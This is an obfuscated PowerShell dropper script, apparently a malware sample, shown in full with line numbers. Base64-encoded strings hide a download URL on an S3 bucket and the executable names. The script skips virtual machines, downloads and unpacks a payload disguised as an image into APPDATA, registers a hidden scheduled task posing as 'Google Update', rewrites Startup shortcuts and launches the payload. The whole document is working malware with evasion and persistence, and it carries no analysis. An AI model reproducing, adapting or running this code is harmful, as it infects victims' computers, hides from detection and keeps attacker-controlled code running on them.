st3.ps1 ISESteroids obfuscation

1. ${/=\_/\/===\_____/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcABzADoALwAvAHMAMwAtAHMAYQAtAGUAYQBzAHQALQAxAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvAGEAbAB1AGwAYQBzADIAMAAxADkALwBYAGsAYgB5AEMAUQBuAEEAagBmAGIAcgBPAHgALgBiAG0AcAA=')))
2. ${/=\/=\/\/===\/===} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgB2AHMAbQBhAHIAdABtAGEAeABhAHAAcAAuAGUAeABlAA==')))
3. ${/=\/\/\_/=\___/==}    = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgB2AHMAbQBhAHIAdABtAGEAeABhAHAAcAA=')))
4. ${___/\/\/\__/=\/=\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZwB1AHAALgBlAHgAZQA=')))
5. function ___/\____/=\/\/==\(${__/\_/=\/\_/===\_/} , ${_/=\/==\_____/=\_/})
6.   {
7.     ${/===\____/=\/=\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBvAG8AZwBsAGUAQgBvAGwA')))
8.     ${__/===\/\_/\__/=\} = ${__/\_/=\/\_/===\_/}
9.     ${_____/\_/\/\_/=\_} = ""
10.     ${_/=\/\/=\/\___/=\}= ${_/=\/==\_____/=\_/}
11.     ${__/==\_____/\/==\} = [datetime]::Now.AddMinutes(1)
12.     ${/=\/\_/==\/\____/} = new-object -ComObject($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAC4AUwBlAHIAdgBpAGMAZQA='))))
13.     ${/=\/\_/==\/\____/}.Connect()
14.     ${_/\/=\/\_/\/==\/\} = ${/=\/\_/==\/\____/}.GetFolder("\")
15.     ${___/=\__/==\_/\_/} = ${/=\/\_/==\/\____/}.NewTask(0)
16.     ${_/\_/==\_/=\/=\__} = ${___/=\__/==\_/\_/}.RegistrationInfo
17.     ${_/\_/==\_/=\/=\__}.Description = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAG4AdADpAG0AIABvACAAcwBlAHUAIABzAG8AZgB0AHcAYQByAGUAIABkAG8AIABHAG8AbwBnAGwAZQAgAGEAdAB1AGEAbABpAHoAYQBkAG8ALgA=')))
18.     ${_/\_/==\_/=\/=\__}.Author = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBvAG8AZwBsAGUAIABVAHAAZABhAHQAZQA=')))
19.     ${/=\/==\/=====\/\/} = ${___/=\__/==\_/\_/}.Settings
20.     ${/=\/==\/=====\/\/}.Enabled = $true
21.     ${/=\/==\/=====\/\/}.StartWhenAvailable = $true
22.     ${/=\/==\/=====\/\/}.AllowDemandStart = $true
23.     ${/=\/==\/=====\/\/}.Hidden = $true
24.     ${__/\_/==\_/\_/=\/} = ${___/=\__/==\_/\_/}.Triggers  
25.     ${___/\/==\/\/\/=\/} = ${__/\_/==\_/\_/=\/}.Create(2)
26.     ${___/\/==\/\/\/=\/}.StartBoundary = ${__/==\_____/\/==\}.ToString($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('eQB5AHkAeQAtAE0ATQAtAGQAZAAnAFQAJwBIAEgAOgBtAG0AOgBzAHMA'))))
27.     ${___/\/==\/\/\/=\/}.Repetition.Interval = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABUADMASAA=')))
28.     ${___/\/==\/\/\/=\/}.Enabled = $true
29.     ${/==\___/=\/=\__/\} = ${___/=\__/==\_/\_/}.Actions.Create(0)
30.     ${/==\___/=\/=\__/\}.Path = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwAvAD0APQA9AFwALwBcAF8ALwBcAF8AXwAvAD0AXAB9AA==')))
31.     ${/==\___/=\/=\__/\}.Arguments = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwBfAF8AXwAvAFwAXwAvAFwALwBcAF8ALwA9AFwAXwB9AA==')))
32.     ${/==\___/=\/=\__/\}.WorkingDirectory = ${_/=\/\/=\/\___/=\}      
33.     ${_/\/=\/\_/\/==\/\}.RegisterTaskDefinition($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AC8APQA9AD0AXABfAF8AXwBfAC8APQBcAC8APQBcAF8ALwB9AA=='))),${___/=\__/==\_/\_/},6,$null,$null,3) | Out-Null    
34.   }
35. function _/==\/\/=\___/=\_/
36. {
37.   ${_/\__/\__/\__/\/=} = Get-WmiObject -Class Win32_ComputerSystem |Select-Object -ExpandProperty Model
38.   if (${_/\__/\__/\__/\/=} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABCAG8AeAA='))) -or
39.     ${_/\__/\__/\__/\/=} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBNAHcAYQByAGUAIABWAGkAcgB0AHUAYQBsACAAUABsAGEAdABmAG8AcgBtAA=='))) -or
40.     ${_/\__/\__/\__/\/=} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUA'))) -or
41.   ${_/\__/\__/\__/\/=} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABWAE0AIABkAG8AbQBVAA=='))))
42.   {
43.     return "Y"
44.   }
45.   else
46.   {
47.     return "N"
48.   }
49. }
50. function ______/\_/\_/=\/\_
51. {
52.   try
53.   {
54.     ${/=\/\/=\_/==\__/\} = Get-Random -Minimum 1 -Maximum 9
55.     ${__/\__/\/=\/=\/\_} = ""
56.     For (${_/\/===\/==\__/\/}=0; ${_/\/===\/==\__/\/} -le ${/=\/\/=\_/==\__/\}; ${_/\/===\/==\__/\/}++)
57.     {
58.       ${_/=\/=\__/=\_/\__}  = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cQB3AGUAcgB0AHkAdQBpAG8AcABsAGsAagBoAGcAZgBkAHMAYQB6AHgAYwB2AGIAbgBtAFEAVwBFAFIAVABZAFUASQBPAFAAQQBTAEQARgBHAEgASgBLAEwAWgBYAEMAVgBCAE4ATQA=')))
59.       ${_/\___/\/=\_/\/\/}  = Get-Random -Minimum 1 -Maximum ${_/=\/=\__/=\_/\__}.Length
60.       ${__/\_/\_/\_/===\/} = ${_/=\/=\__/=\_/\__}.Substring(${_/\___/\/=\_/\/\/},1)
61.       ${__/\__/\/=\/=\/\_} = ${__/\__/\/=\/=\/\_}+${__/\_/\_/\_/===\/}  
62.     }
63.     return ${__/\__/\/=\/=\/\_}
64.   }
65.   finally{}
66. }
67. function __/=\/\/\_/=\_/\__(${_/=\___/=\_/\___/\}, ${_/=\/\/\_/\/======})
68. {
69.     ${/=\______/====\__} = New-Object $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBVAHIAaQA='))) $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8ALwA9AFwAXwBfAF8ALwA9AFwAXwAvAFwAXwBfAF8ALwBcAH0A')))
70.     ${__/\/==\_/=\/\/=\} = [System.Net.HttpWebRequest]::Create(${/=\______/====\__})
71.     ${__/\/==\_/=\/\/=\}.set_Timeout(15000)
72.     ${/=\__/=\__/\___/=} = ${__/\/==\_/=\/\/=\}.GetResponse()
73.     ${_/\/=\____/\_/=\_} = [System.Math]::Floor(${/=\__/=\__/\___/=}.get_ContentLength()/1024)
74.     ${__/\/=\/\__/\_/\/} = ${/=\__/=\__/\___/=}.GetResponseStream()
75.     ${___/==\/\/\/\____} = New-Object -TypeName System.IO.FileStream -ArgumentList ${_/=\/\/\_/\/======}, Create
76.     ${_/\_/==\_/\/\/\__} = new-object byte[] 10KB
77.     ${/=\/==\__/\/=\/==} = ${__/\/=\/\__/\_/\/}.Read(${_/\_/==\_/\/\/\__},0,${_/\_/==\_/\/\/\__}.length)
78.     ${/=\_/\_/=\/\___/=} = ${/=\/==\__/\/=\/==}
79.     while (${/=\/==\__/\/=\/==} -gt 0)
80.     {
81.         ${___/==\/\/\/\____}.Write(${_/\_/==\_/\/\/\__}, 0, ${/=\/==\__/\/=\/==})
82.         ${/=\/==\__/\/=\/==} = ${__/\/=\/\__/\_/\/}.Read(${_/\_/==\_/\/\/\__},0,${_/\_/==\_/\/\/\__}.length)
83.         ${/=\_/\_/=\/\___/=} = ${/=\_/\_/=\/\___/=} + ${/=\/==\__/\/=\/==}
84.     }
85.     ${___/==\/\/\/\____}.Flush()
86.     ${___/==\/\/\/\____}.Close()
87.     ${___/==\/\/\/\____}.Dispose()
88.     ${__/\/=\/\__/\_/\/}.Dispose()
89.     return "Y"
90. }
91. function __/====\/\_____/\_
92. {
93.   Param([string]${___/\_/==\_/===\_/},[string]${_/=\/==\/=\_/==\__});
94.   try{  
95.     ${/\______/==\__/=\} = New-Object -ComObject WScript.Shell
96.     ${/=\/\/\/\__/\/===} = ${/\______/==\__/=\}.CreateShortcut(${___/\_/==\_/===\_/})
97.     ${/=\/\/\/\__/\/===}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8ALwA9AFwALwA9AD0AXAAvAD0AXABfAC8APQA9AFwAXwBfAH0A')))
98.     ${/=\/\/\/\__/\/===}.Arguments = ""
99.     ${/=\/\/\/\__/\/===}.WorkingDirectory = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAHsAXwBfAF8ALwBcAF8ALwBcAF8ALwBcAC8AXABfAC8APQBcAH0A')))
100.     ${/=\/\/\/\__/\/===}.WindowStyle = 7
101.     ${/=\/\/\/\__/\/===}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
102.     ${/=\/\/\/\__/\/===}.Save()
103.   }finally{}
104. }
105. function __/\__/==\/\__/=\/
106. {
107.   try
108.   {
109.     ${___/=\____/\_/=\/} = New-Object System.Threading.Mutex($false, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NAA0ADQANAA0ADQANAA0ADQANAA0ADQA'))))
110.     return ${___/=\____/\_/=\/}.WaitOne()  
111.   }finally{}
112. }
113.   if (_/==\/\/=\___/=\_/ -eq "N")
114.   {
115.     if (__/\__/==\/\__/=\/)
116.     {    
117.       stop-process -name wmplayer
118.       ${_/\/====\___/==\_} = ${env:APPDATA}+"\"
119.       ${/==\_/\______/\/\} = ______/\_/\_/=\/\_
120.       ${___/\_/\_/\/\_/=\} = ______/\_/\_/=\/\_
121.       ${/=\_____/=\____/\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB0AHgAdAA=')))
122.       ${/======\_/\____/=} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB2AGIAcwA=')))
123.       ${___/\/\_/=\/\/==\}  = ${_/\/====\___/==\_}+${/==\_/\______/\/\}+${/=\_____/=\____/\}
124.       ${/=\__/=\/===\/==\} = new-object -ComObject scripting.filesystemobject
125.       ${/=\__/=\/===\/==\}.CreateFolder(${_/\/====\___/==\_}+${___/\_/\_/\/\_/=\})  | Out-Null
126.       sleep -s 1
127.       ${_/\/\__/=\__/\/=\}  = $false
128.       while(${_/\/\__/=\__/\/=\} -ne $true)
129.         {
130.         __/=\/\/\_/=\_/\__ ${/=\_/\/===\_____/} ${___/\/\_/=\/\/==\}; sleep -s 1
131.         if ((Get-Item ${___/\/\_/=\/\/==\}).length -gt 2048kb)
132.          {
133.            ${_/\/\__/=\__/\/=\}  = $true                                                          
134.            ${/=\_/=\/===\____/} =  "Y"
135.           }
136.           else
137.            {                    
138.             ${/=\_/=\/===\____/} = "N"
139.            }
140.         Write-Host ${_/\/\__/=\__/\/=\}
141.         }  
142.        ${/=\_/=\/===\____/} =  "Y"
143.         if (${/=\_/=\/===\____/} -eq "Y")
144.         {
145.           ${_/\__/\/===\_/==\} = ${_/\/====\___/==\_}+${/==\_/\______/\/\} +$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB6AGkAcAA=')))
146.           Rename-Item -Path $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwBfAC8AXAAvAFwAXwAvAD0AXAAvAFwALwA9AD0AXAB9AA=='))) -NewName $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8ALwBcAF8AXwAvAFwALwA9AD0APQBcAF8ALwA9AD0AXAB9AA==')));
147.           ${_/\_/\______/=\__} = New-Object -ComObject shell.application
148.           ${_/\__/\/=\/===\__} = ${_/\_/\______/=\__}.NameSpace(${_/\__/\/===\_/==\})              
149.           foreach (${___/=\/==\_/==\_/} in ${_/\__/\/=\/===\__}.items())
150.           {            
151.             ${_/\_/\______/=\__}.Namespace(${_/\/====\___/==\_}+${___/\_/\_/\/\_/=\}).CopyHere(${___/=\/==\_/==\_/}, 0x14)
152.           }                        
153.           sleep -s 3
154.           del ${_/\__/\/===\_/==\}
155.           ___/\____/=\/\/==\ -__/\_/=\/\_/===\_/ $env:APPDATA\${___/\_/\_/\/\_/=\}\${___/\/\/\__/=\/=\} -_/=\/==\_____/=\_/ $env:APPDATA\${___/\_/\_/\/\_/=\}
156.           ${_/\__/\/\___/\__/} = New-Object -Com WScript.Shell
157.           ${/=\___/=\_/==\/=\} = ${_/\__/\/\___/\__/}.SpecialFolders.Item($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAcgB0AHUAcAA='))));          
158.           del ${/=\___/=\_/==\/=\}\*.vbs
159.           del ${/=\___/=\_/==\/=\}\*.lnk      
160.           ${____/===\/=\_____} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAHsAXwBfAF8ALwBcAF8ALwBcAF8ALwBcAC8AXABfAC8APQBcAH0AXAAkAHsALwA9AFwALwA9AFwALwBcAC8APQA9AD0AXAAvAD0APQA9AH0A')))          
161.           ${_/\_____/=\/=\__/} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AC8APQBcAF8AXwBfAC8APQBcAF8ALwA9AD0AXAAvAD0AXAB9AFwAJAB7AC8APQBcAC8AXAAvAFwAXwAvAD0AXABfAF8AXwAvAD0APQB9AC4AbABuAGsA')))          
162.           __/====\/\_____/\_ ${_/\_____/=\/=\__/}  ${____/===\/=\_____};
163.           cd $env:APPDATA\${___/\_/\_/\/\_/=\}; Start-Process $env:APPDATA\${___/\_/\_/\/\_/=\}\${/=\/=\/\/===\/===};
164.         }    
165.     }        
166.   }